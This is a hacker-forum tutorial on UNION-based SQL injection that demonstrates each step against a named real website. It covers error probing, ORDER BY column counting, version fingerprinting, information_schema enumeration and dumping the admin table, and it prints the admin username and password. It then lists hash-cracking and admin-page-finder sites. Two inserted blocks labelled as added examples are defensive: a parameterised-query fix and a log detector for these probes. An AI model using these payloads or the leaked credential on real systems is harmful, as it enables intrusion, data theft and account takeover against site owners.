- Injecting a site manually
- Hacker zurael sTz
- https://twitter.com/zurael_stz
- Common Types of SQL injection are:
- Code:
- UNION Based SQL injection
- String Based SQL injection
- Error Based SQL injection
- Double Query SQL injection
- Blind SQL injection
- MsSQL injection
- What we are going to learn today is what we call UNION Based SQL injection
- Alright, before we start we need to know how a website works when it stores login information, pages, pictures, etc. in its database
- Let's say our website URL looks like this:
- "http://www.site.com/index.php?id=5"
- Notice at the end of the URL, "id=5"
- This is what the query will look like:
- PHP Code:
- SELECT * FROM index
- WHERE id = 5
- Alright, now you know a bit about how the website works, let's get hacking Hehe
- Step 1: Finding the vulnerability in a website
- It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
- To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
- Alright, now, the way to find sites vulnerable to SQLi is by using Google Dorks.
- If you don't know how to use dorks, visit Part 1 of this project to learn all about them
- Once you've found a site vulnerable to SQLi, it's time to execute queries.
- For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.
- Try browsing the website and see if you can find links like "index.php?id=xxx"
- It can be anything like "details.php?id=xxx" or "gallery.php?id="
- Just find an address with a number at the end of the URL
- Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"
- Now, to test for the vulnerability, ADD a quote ( ' ) at the end of the URL, i.e. after the integer or string
- So it'll look like this:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'
- Now you'll notice an error saying:
- Code:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
- This shows that the website is vulnerable to SQL injection.
- How is this possible?
- Look at the query when we added a quote ( ' ):
- PHP Code:
- SELECT * FROM article
- WHERE id = 5 '
- Notice that the query now ends in a stray quote ( ' ), which is not valid SQL and which the database cannot parse
- This is why it returns an error instead of a result
- Now that we know the website is vulnerable to SQL injection, let's advance to the next process
- Step 2: Finding the number of columns a website has
- This is the part most people commonly misunderstand.
- To get to the point, what we're about to do is find how many columns the website has by watching which ORDER BY values return an error and which do not.
- Alright, let's get started.
- The query we'll be using is "order by X--" where "X" is a random integer (number)
- Start by entering "order by 25--"
- Enter it at the end of the URL, so it'll look like this
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
- Error, so there are not 25 columns; the count is less than 25
- Now let's try "order by 20--"
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
- Still Error, so there are less than 20 columns
- How about we go down a bit to "order by 5--"
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
- aha! No errors. So let's see if there are more than 5 columns
- Now let's go up to "order by 11--"
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
- Hmm, no errors. So there are at least 11 columns, and possibly more
- Let's see if we can increase to "order by 12--"
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
- Error! So the last number that returned no error is 11
- Therefore, the website has 11 columns
- Tips:
- An error while scanning for the number of columns will look like the MySQL error message shown earlier (the original post has a screenshot here)
- While no error will show the page as normal
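- The following is an added example, not code from the original post. It shows the two ways a page like "newsdetail.php?id=51" can build its query, run against a small SQLite table constructed here (table and column names are assumptions): the concatenating version reproduces the error/no-error signal that Step 1 (the quote) and Step 2 (ORDER BY counting) rely on, while the parameterised version never lets the input become SQL.

```python
# Added example (not from the paste): a concatenated query beside its
# parameterised fix, run against an in-memory SQLite table built here.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO article VALUES (?, ?)",
                 [(5, "Battery basics"), (51, "News item 51")])
conn.commit()


def lookup_vulnerable(raw_id):
    """Pastes the query-string value straight into the SQL text, as the
    tutorial's target page does. Whatever the visitor appends is executed."""
    sql = "SELECT * FROM article WHERE id = " + raw_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # A stray quote, or an ORDER BY past the real column count, breaks
        # the statement: the error/no-error signal used in Steps 1 and 2.
        return "SQL error: " + str(exc)


def lookup_safe(raw_id):
    """Validates the type first and binds the value as a parameter, so the
    input is data and can never change the shape of the statement."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return []  # reject the request instead of interpolating it
    return conn.execute("SELECT * FROM article WHERE id = ?",
                        (article_id,)).fetchall()
```

With the safe version, "51'" and "51 order by 25--" both fail the integer check and return nothing, so there is no error message for a visitor to learn from.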
- Step 3: Now that we have found the number of columns, it's time to execute the UNION SELECT statement
- First off, we need to know what "UNION SELECT" means
- Let's say we have 2 tables, "users" and "admin"
- Basically, UNION SELECT is a statement that combines the results of two queries into one result set.
- Look at this query:
- PHP Code:
- SELECT * FROM users
- UNION SELECT * FROM admin
- If we perform the UNION SELECT statement, we can get both users and admin information from their database
- The point is that UNION SELECT returns our own query's results alongside the page's, with the information we need
- If you want to find vulnerable columns, use UNION SELECT
- If you want to find version of database, UNION SELECT
- If you want admin information! use UNION SELECT Hehe
- Alright, now that we know something about UNION, let's continue.
- Take our website that has 11 columns and add a "UNION SELECT" statement.
- Here's what our query will look like:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
- This is what you would normally do when using UNION while SQL injecting a website
- Focus on something like this: "index.php?id=-X UNION SELECT N--"
- Where "X" is the original integer/string (note the extra hyphen ( - ) placed before it) and "N" is the column list 1,2,...,N, with N being the number of columns, followed by two hyphens ( -- )
- Step 4: Random numbers appear on screen; the next step
- Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
- These are known as "vulnerable columns": the positions whose contents the page actually displays, which is where we can place the data we want to extract.
- Here's what it'll look like: the column numbers printed on the page (the original post has a screenshot here)
- You need to inject into the number shown at the very top of the page (always the one at the very top)
- So, in this case we have number "8"
- Now you might be asking, what can I do with a vulnerable column?
- Well here's what you can get-- INFORMATION!
- You need a lot of information about the website to study; here are a couple of examples.
- Replace the vulnerable column, i.e. number 8, with one of these statements
- Statements:
- Code:
- @@version, version()
- database()
- user(),
- @@hostname
- @@datadir
- Their functions:
- @@version/version() = find the version of the database
- database() = find the current database
- user() = find the database user the website connects as
- @@hostname = the hostname of the database server
- @@datadir = the directory where the database stores its data files
- To find the version of the database in the website, replace the vulnerable column, i.e. number 8, with "@@version" or "version()"
- It'll look like this:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
- Results:
- Code:
- 5.1.52-log
- So the database version is 5.x, which is good because it'll be easier to SQL inject the website.
- Note:
- Database version less than 5 "<5" = you need to guess tables (a bit of hard work)
- Database version greater than 5 ">5" = easy to inject with another function, i.e. group_concat
- If you ever want to SQLi a website with version <5, then you can guess the tables using the list below:
- Code:
- user
- username
- usernames
- admin
- admins
- users
- manager
- account
- accounts
- member
- login
- logins
- members
- tbl_user
- tbl_users
- tbl_admin
- tbl_admins
- tbl_member
- tbl_members
- tbladmins
- memberlist
- tbluser
- tblusers
- tblmanager
- tblmanagers
- tblclients
- tblservers
- adminuser
- usertbl
- userstbl
- admintbl
- adminstbl
- id
- tuser
- tusers
- uid
- userid
- user_id
- auid
- adminpass
- LoginID
- FirstName
- LastName
- cms_user
- cms_member
- cms_users
- cms_members
- cms_admin
- cms_admins
- user_admin
- user_info
- user_list
- user_login
- user_logins
- user_names
- userrights
- userinfo
- userlist
- webadmin
- webadmins
- Webmaster
- Webuser
- product
- products
- tblproducts
- tblproduct
- tbl_tbadmin
- Adminlogin
- We'll learn how to get the tables in the next step.
- But for now, let's see what we can get with the other statements
- Let's try all statements at once, shall we?
- The URL will look like this:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,10,11--
- Results:
- Code:
- 32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
- 3
- We now have almost every piece of information about the website
- Look closely here: we used a function, "group_concat"
- Here's its function:
- group_concat = gets all the information at once, i.e. concatenates the values of the statements you pass it into one string. Ex. group_concat(database())
- Note: group_concat won't work with versions less than 5
- Step 5: Getting the table names
- What are tables?
- Tables contain columns and columns contain the data
- It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
- Alright, first let's look up some functions we're gonna use to extract table names (Important)
- Code:
- group_concat = groups the values of a specific statement into one string
- table_name = the column of information_schema.tables that holds each table's name, to be shown on screen
- from = specifies where a statement selects from
- information_schema.tables = the system table that lists every table in the database, with their names in it
- table_schema = the database each table belongs to
- database() = the current database of the website
- 0x0a = the hex code for a newline character, used to put each table name on its own line
- Now let's combine those functions and make up a query that will give us the table names
- So, here's what our link will look like:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
- In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
- and then we added
- "from information_schema.tables where table_schema=database()--"
- after the last column, i.e. after 11 and in place of the two hyphens that followed it
- Results on table names:
- Code:
- pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
- Alright, now that we've found the tables, what you're gonna have to do is
- find the tables where user/admin information is stored
- In this case, "tbladmin" seems to have admin information stored in it.
- It's all about predicting and expecting what's behind every table you see
- Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
- Replace and add the following:
- Vulnerable Column = replace with "group_concat(table_name,0x0a)"
- After the last column = Add "from information_schema.tables where table_schema=database()--"
- Also, don't forget about UNION SELECT before the column numbers, and the hyphen ( - ) before "X" at index.php?id=X, where "X" is a random integer/string
- Step 6: Getting Columns from Tables
- Alright, obviously our next task is to get the column names from a specific table, which in our case was "tbladmin"
- To do this, we're gonna have to alter some queries a bit
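- As an added example (not from the original post), here is a small detector for the probes walked through in Steps 1 to 5 (the quote test, ORDER BY counting, UNION SELECT, the @@version style fingerprints and the information_schema lookups), run over a few constructed access-log lines in the common Apache/nginx combined format. The log lines, the client addresses and the rule names are all made up for the example.

```python
# Added example (not from the paste): flagging the tutorial's probe
# patterns in web-server access logs. All sample lines are constructed.
import re
from urllib.parse import unquote_plus

# Each rule is (label, regex) applied to the URL-decoded, lower-cased path.
RULES = [
    ("quote_probe", re.compile(r"[?&]id=-?\d+'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\s*--")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)")),
    ("fingerprint", re.compile(r"@@version|version\(\)|@@datadir|@@hostname")),
]

# Combined-format line: client, ident, user, [time], "METHOD path PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

SAMPLE_LOG = [  # constructed, mirroring the tutorial's sequence of requests
    '203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /newsdetail.php?id=51 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2012:13:55:40 +0000] "GET /newsdetail.php?id=51%27 HTTP/1.1" 200 640',
    '203.0.113.7 - - [10/Oct/2012:13:56:02 +0000] "GET /newsdetail.php?id=51%20order%20by%2012-- HTTP/1.1" 200 640',
    '203.0.113.7 - - [10/Oct/2012:13:57:15 +0000] "GET /newsdetail.php?id=-51%20UNION%20SELECT%201,2,3,4,5,6,7,@@version,9,10,11-- HTTP/1.1" 200 5001',
    '203.0.113.7 - - [10/Oct/2012:13:58:01 +0000] "GET /newsdetail.php?id=-51+UNION+SELECT+1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5200',
    '198.51.100.4 - - [10/Oct/2012:14:01:10 +0000] "GET /gallery.php?id=12 HTTP/1.1" 200 8800',
]


def parse(line):
    """Returns (client_ip, decoded_path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group(1), unquote_plus(m.group(2)), int(m.group(3))


def classify(line):
    """Returns the labels of every rule the request path trips (in RULES order)."""
    parsed = parse(line)
    if parsed is None:
        return []
    path = parsed[1].lower()
    return [label for label, rx in RULES if rx.search(path)]


def flag_requests(lines):
    """Returns (client_ip, decoded_path, labels) for each line that trips a rule."""
    hits = []
    for line in lines:
        labels = classify(line)
        if labels:
            ip, path, _ = parse(line)
            hits.append((ip, path, labels))
    return hits
```

Decoding before matching matters: the browser sends the spaces in "order by 12--" as %20 or +, so a rule applied to the raw path would miss them.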
- Now look closely at this syntax:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
- Here's what we replaced:
- table_name = replaced by "column_name"
- information_schema.tables = replaced by "information_schema.columns"
- table_schema = replaced by "table_name"
- database() = replaced by "0x74626c61646d696e--"
- Now that you know the replacements in our syntax, you still might be wondering what's up with the last part, where we entered "0x74626c61646d696e--"
- First of all, this is a hex-encoded value
- To make MySQL read a hex value as a string, we put "0x" at the beginning
- I'll explain this briefly. So our table name was "tbladmin"
- To reference that table in the syntax above, we have to convert its name to hex
- In order to do that, visit this website:
- http://www.swingnote.com/tools/texttohex.php
- It's a text to hex converter
- Enter "tbladmin" in the text box and hit convert
- You'll notice the results will be "74626c61646d696e" (that's the hex)
- Now to make it readable to the website, add "0x" at the beginning
- So it will be:
- Code:
- 0x74626c61646d696e
- Now that you know how hex works, let's look at the functions we replaced and their uses (Important)
- Code:
- group_concat(column_name,0x0a) = groups the column names we're going to extract, one per line
- information_schema.columns = the system table listing every column of every table in the database
- table_name = the column we filter on to extract columns from a specific table
- 0xHEX_Code_Table = the specific table name converted to hex
- Results after extracting column names from tables:
- Code:
- adminid ,username ,password ,dom
- Now that we've got the columns from that table, it's time to extract the information.
- What we're gonna need here is obviously only the "username" and "password"
- Step 7: Getting Data from Columns
- Alright, let's extract the information
- Look closely at the syntax:
- Code:
- http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
- Keep this formula-like syntax in your mind whenever you want to extract data from columns
- Code:
- http://www.site.com/index.php?id=-X UNION SELECT N,group_concat(columnName,0x3a,columnName,0x0a) from tablename--
- Where "X" is the original integer/string preceded by a hyphen ( - ), "N" stands for the numbered columns with the vulnerable position replaced by the group_concat, "columnName" is the column whose data you want to extract, and "tablename" is the specific table you extract it from, followed by two hyphens ( -- ) at the end
- Now, to recap:
- column names = username, password
- separator = 0x3a (a hex for a colon " : ")
- table name = tbladmin
- Once you execute that syntax, you get the username and password separated by a colon
- Results after executing the syntax:
- Code:
- ishir:ishir123
- Username: ishir
- Password: ishir123
- Special cases: Hashed Usernames and Passwords
- Most websites will have their passwords hashed as MD5
- In this case you'll need to crack them.
- Some websites can help you with this.
- Here's a list of hash cracking websites:
- Code:
- www.md5decrypter.co.uk/
- www.md5this.com/
- www.md5crack.com/
- http://hashchecker.de/find.html
- An MD5 Hash will look like this:
- Code:
- 21232f297a57a5a743894a0e4a801fc3 -- 32 characters
- A SHA-1 Hash will look like this:
- Code:
- d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
- I'll make up a detailed tutorial on Hash cracking soon.
- But for now, refer to this for a little knowledge about hashes
- http://hackforums.net/showthread.php?tid=1393830
- Credits to Haxor and Insidepro
- Last Step: Finding the admin page and logging in for the goods
- Alright, now that we have our admin login info:
- Username: ishir
- Password: ishir123
- It's time to find the login page
- To do this, you can use admin page finders
- Here are some you can use:
- >>Scorpion Admin Page Finder<<
- http://sc0rpion.ir/af/
- >>Outlaw Admin Page Finder<<
- http://www.tools.th3-0utl4ws.com/admin-finder/
- >>Napsterakos Admin Page Finder<<
- http://hackforums.net/showthread.php?tid...ight=HaviJ
- >>HaviJ Injector/Cracker and Admin page finder<<
- http://hackforums.net/showthread.php?tid...age+finder
- Alright, after scanning the website for admin pages, you should see something like this:
- Code:
- http://www.leadacidbatteryinfo.org/admin/